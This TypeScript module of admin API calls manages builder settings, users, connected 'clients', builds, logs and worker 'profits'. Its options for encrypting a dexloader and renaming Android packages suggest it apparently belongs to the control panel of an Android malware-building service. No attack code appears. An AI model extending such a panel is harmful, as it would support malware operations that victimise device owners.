import { api } from './http';
import type { IAdminStats, StatsPeriod } from '@/entities/admin-stats.entity';
import type { IAdminBuild, IAdminProfit, IAdminUser, IAdminUserDetail, UserRole } from '@/entities/admin-user.entity';
import type { IBuildLogLine } from '@/entities/build-live.entity';
import type { IClient } from '@/entities/client.entity';

export interface IAdminSettings {
	builderEnabled: boolean;
	dailyBuildLimit: number;
	defaultBuilderIcons: string[];
	encryptEnabled: boolean;
	encryptDexloader: 'yes' | 'no';
	encryptAssets: 'yes' | 'no';
	encryptRenamePackage: 'yes' | 'no';
	testBuildEnabled: boolean;
	builderAndroidProjects: { id: string; label: string; dir: string }[];
}

export async function fetchAdminSettings() {
	const { data } = await api.get<IAdminSettings>('/admin/settings');
	return data;
}

export async function patchAdminSettings(body: Partial<IAdminSettings>) {
	const { data } = await api.patch<IAdminSettings>('/admin/settings', body);
	return data;
}

export async function fetchAdminStats(period: StatsPeriod) {
	const { data } = await api.get<IAdminStats>('/admin/stats', { params: { period } });
	return data;
}

export async function fetchAdminUsers(params: {
	search?: string;
	role?: UserRole;
	cursor?: number;
	limit?: number;
}) {
	const { data } = await api.get<{ users: IAdminUser[]; nextCursor: number | null }>('/admin/users', { params });
	return data;
}

export async function fetchAdminUser(profileId: number) {
	const { data } = await api.get<{ user: IAdminUserDetail }>(`/admin/users/${profileId}`);
	return data.user;
}

export async function patchAdminUser(profileId: number, body: { role?: UserRole; isBanned?: boolean }) {
	const { data } = await api.patch<{ user: IAdminUserDetail }>(`/admin/users/${profileId}`, body);
	return data.user;
}

export async function fetchAdminUserClients(
	profileId: number,
	params: { cursor?: string; limit?: number; isOnline?: boolean; search?: string },
) {
	const { data } = await api.get<{ clients: IClient[]; nextCursor: string | null }>(`/admin/users/${profileId}/clients`, {
		params,
	});
	return data;
}

export async function fetchAdminUserBuilds(profileId: number) {
	const { data } = await api.get<{ builds: IAdminBuild[] }>(`/admin/users/${profileId}/builds`);
	return data.builds;
}

export async function fetchAdminBuildLogs(buildId: string) {
	const { data } = await api.get<{ buildId: string; lines: IBuildLogLine[]; failureMessage?: string }>(
		`/admin/builds/${encodeURIComponent(buildId)}/logs`,
	);
	return data;
}

export async function fetchAdminUserProfits(profileId: number, params?: { cursor?: number; limit?: number }) {
	const { data } = await api.get<{ profits: IAdminProfit[]; nextCursor: number | null }>(`/admin/users/${profileId}/profits`, {
		params,
	});
	return data;
}

export async function createProfit(workerName: string, amount: number) {
	const { data } = await api.post('/create-profit', { workerName, amount });
	return data;
}
